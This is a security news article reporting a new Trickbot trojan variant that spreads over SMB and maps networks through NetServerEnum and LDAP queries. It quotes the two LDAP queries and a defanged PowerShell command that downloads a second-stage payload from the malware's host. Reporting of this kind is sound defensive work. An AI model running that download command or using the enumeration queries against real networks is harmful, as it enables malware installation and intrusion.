Categories: Malware

New Version of Trickbot Trojan Spread via Local SMB to Perform NetServer and LDAP Enumeration

A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module  “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB

It performs scanning to find the list of servers using  NetServerEnum Windows API that spread locally via Server Message Block (SMB).

it also has the ability to performing an Enumeration to others computer using  Lightweight Directory Access Protocol (LDAP) enumeration.

Previous SMB Vulnerability Exploit  Major Impact through WannaCry and Petya Ransomware Global Outbreak.

Also Read  Mobile Banking Malware “Svpeng” Working as a Keylogger and Steals Contacts and Call Logs

Trickbot Trojan Execution Flow

Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.

Trickbot TrojanTrickbot Trojan

Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.

Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Trickbot creates 2 queries to perform LDAP Enumeration.

• (objectCategory=computer)
• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.

Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”

Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.

Powershell Script that used to inject to Download another Malware.

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.

Trickbot Malware also learning the methodology of biggest Global outbreak Ransomware Wannacry and Petya and replicate its Functions. Flashpoint said.

Also Read    Mobile Ransomware “LeakerLocker” Found in Play Store Apps that Encrypt and Send Personal Data on a Remote Server

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Hackers Exploit RVTools to Deploy Bumblebee Malware on Windows Systems

A reliable VMware environment reporting tool, RVTools, was momentarily infiltrated earlier this week on May…

1 hour ago

Confluence Servers Under Attack: Hackers Leverage Vulnerability for RDP Access and Remote Code Execution

Threat actors exploited a known vulnerability, CVE-2023-22527, a template injection flaw in Atlassian Confluence servers…

2 hours ago

New ModiLoader Malware Campaign Targets Windows PCs, Harvesting User Credentials

AhnLab Security Intelligence Center (ASEC) has recently uncovered a malicious campaign distributing ModiLoader (also known…

2 hours ago

Health Care Data Breach Costs BreachForums Admin $700,000 Fine

Conor Brian Fitzpatrick, the 22-year-old former administrator of cybercrime forum Breachforums, will forfeit approximately $700,000…

2 hours ago

Critical Firefox 0-Day Flaws Allow Remote Code Execution

Mozilla has urgently patched two critical 0-day vulnerabilities in its popular web browser Firefox, both…

2 hours ago

CISA to Stop Publishing Cybersecurity Alerts and Advisories on Webpages

Cybersecurity and Infrastructure Security Agency (CISA) has announced significant changes to how it communicates cybersecurity…

2 hours ago